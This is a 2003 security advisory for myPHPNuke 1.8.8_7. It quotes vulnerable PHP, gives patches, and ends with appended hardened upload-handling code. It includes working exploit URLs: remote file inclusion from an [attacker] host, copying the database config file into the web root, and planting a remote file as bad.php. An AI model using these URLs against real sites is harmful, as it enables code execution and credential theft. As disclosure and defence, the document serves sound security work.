[VulnWatch] myPHPNuke : Copy/Upload/Include Files

From: Frog Man (leseulfrog_at_hotmail.com)
Date: 09/11/03

    To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
    Date: Thu, 11 Sep 2003 12:14:09 +0200
    
    

    Information :
    °°°°°°°°°°°°°
    Language : PHP
    Version : 1.8.8_7
    Website : http://www.myphpnuke.com
    Problems : - Upload/Copy/Include Files

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°

    gallery/displayCategory.php :

    ------------------------------------------
    [...]
    <?php

    include ("$basepath/imageFunctions.php");
    include ("$adminpath/fileFunctions.php");
    ------------------------------------------

    mailattach.php :

    -----------------------------------------------------
    [...]
    <?
    OpenTable();
      global $attachmentdir;

      $attchfile = $attachmentdir.$attach1_name;

       if(isset($submit) ) {
           if ($attach1_name != "") {
               copy("$attach1", $attchfile)
                or die("Couldn't copy the file!");
                echo "<script> attach();</script>";
           } else {
               die("No input file specified");
           }
           echo "<script> attach(); </script>";
       } else {

    ?>
    [...]
    -----------------------------------------------------

    Exploits :
    °°°°°°°°
    - http://[target]/gallery/displayCategory.php?basepath=http://[attacker]
    will include the file :
    http://[attacker]/imageFunctions.php

    - http://[target]/gallery/displayCategory.php?adminpath=http://[attacker]
    will include the file :
    http://[attacker]/fileFunctions.php

    - http://[target]/mailattach.php?submit=1&attach1=admin/original/config.php&attach1_name=../DBInfos.txt
    will copy the file admin/original/config.php (with DB Informations) into
    http://[target]/DBInfos.txt .

    - http://[target]/mailattach.php?submit=1&attach1=http://[attacker]/bad.txt&attach1_name=../bad.php
    will copy the file bad.txt into http://[target]/bad.php

    - etc...

    Solution :
    °°°°°°°°°
    A patch can be found on http://www.phpsecure.info.
    In gallery/displayCategory.php, add before all other lines the lines :
    -------------------------------------------------------------------
    if (isset($_REQUEST["basepath"]) OR isset($_REQUEST["adminpath"])){
    die("Patched.");
    }
    -------------------------------------------------------------------

    And in mailattach.php, add just after the lines :
    -------------------------
    [...]
    <?
    OpenTable();
       global $attachmentdir;
    [...]
    -------------------------

    the lines :

    -------------------------------------------------------------------
       if (isset($_REQUEST["attach1_type"]) OR isset($_REQUEST["attach1_name"])
           OR ereg("/",$attach1) OR ereg("\.\.",$attach1) OR ereg(".php",$attach1_name)
       ){
           die("Patched.");
       }
    -------------------------------------------------------------------

    More Details :
    °°°°°°°°°°°°
    In French :
    http://www.phpsecure.info/v2/tutos/myPHPNuke.txt

    frog-m@n (http://www.phpsecure.info)
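The snippets above show the two root causes: include paths and the copy() source and destination are all taken straight from request variables (register_globals), so any path or URL can be supplied. Below is a hardened counterpart to the mailattach.php logic, added here as an illustration; it is not myPHPNuke code and not the advisory's patch. It assumes the attachment directory shown exists and is writable, that the form posts the file as a genuine multipart upload named "attach1", and the extension allowlist is an example.

```php
<?php
// Hardened counterpart to the vulnerable mailattach.php logic. Added example,
// not myPHPNuke code and not the advisory's patch. Directory names and the
// extension allowlist are assumptions.

$basepath      = __DIR__;                      // fixed server-side; never taken from the request
$attachmentdir = __DIR__ . '/attachments';     // assumed location
$allowed_ext   = ['txt', 'jpg', 'png', 'pdf']; // assumed allowlist; no script extensions

// Because $basepath is assigned here, a request parameter of the same name
// has no effect even when register_globals is enabled.
if (is_file("$basepath/imageFunctions.php")) {
    include "$basepath/imageFunctions.php";
}

// Reduce a user-supplied name to a safe file name, or return null.
// Directory components are discarded, so "../DBInfos.txt" can only ever mean
// "DBInfos.txt"; extensions not on the allowlist are refused outright, and the
// stem is rewritten so a double extension such as "x.php.txt" becomes "x_php.txt".
function safe_attachment_name(string $name, array $allowed_ext): ?string
{
    $base = basename(str_replace('\\', '/', $name));
    if ($base === '' || $base === '.' || $base === '..') {
        return null;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed_ext, true)) {
        return null;
    }
    $stem = preg_replace('/[^A-Za-z0-9_-]/', '_', pathinfo($base, PATHINFO_FILENAME));
    if ($stem === '') {
        return null;
    }
    return substr($stem, 0, 64) . '.' . $ext;
}

// Store one entry of $_FILES. Only a genuine upload is accepted, so neither a
// local path (e.g. a config file) nor a URL can serve as the copy source, and
// the destination is built from the validated name inside the fixed directory.
function store_attachment(array $file, string $attachmentdir, array $allowed_ext): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $name = safe_attachment_name((string) $file['name'], $allowed_ext);
    if ($name === null) {
        return null;
    }
    $dir = realpath($attachmentdir);
    if ($dir === false || !is_dir($dir)) {
        return null;
    }
    $dest = $dir . DIRECTORY_SEPARATOR . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

if (isset($_POST['submit'], $_FILES['attach1'])) {
    $stored = store_attachment($_FILES['attach1'], $attachmentdir, $allowed_ext);
    echo $stored === null ? 'Attachment rejected.' : 'Attachment stored.';
}

// When run from the command line, show how the validator treats a few names,
// including the two destination names used in the advisory's examples.
if (PHP_SAPI === 'cli') {
    foreach (['report.txt', '../DBInfos.txt', '../bad.php', 'notes.PHP', 'a/b/c.png'] as $n) {
        printf("%-18s -> %s\n", $n, var_export(safe_attachment_name($n, $allowed_ext), true));
    }
}
```

The design choice is to stop trusting the request for anything that names a file: the include path is a server-side value, the copy source is whatever PHP itself placed in the upload temp directory (checked with is_uploaded_file), and the destination is a validated name joined to a fixed directory rather than a concatenation of two attacker-controlled strings. At the configuration level, register_globals should be off (it was removed in PHP 5.4), allow_url_include=Off blocks remote include() targets, and allow_url_fopen=Off prevents copy() from reading http:// sources.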
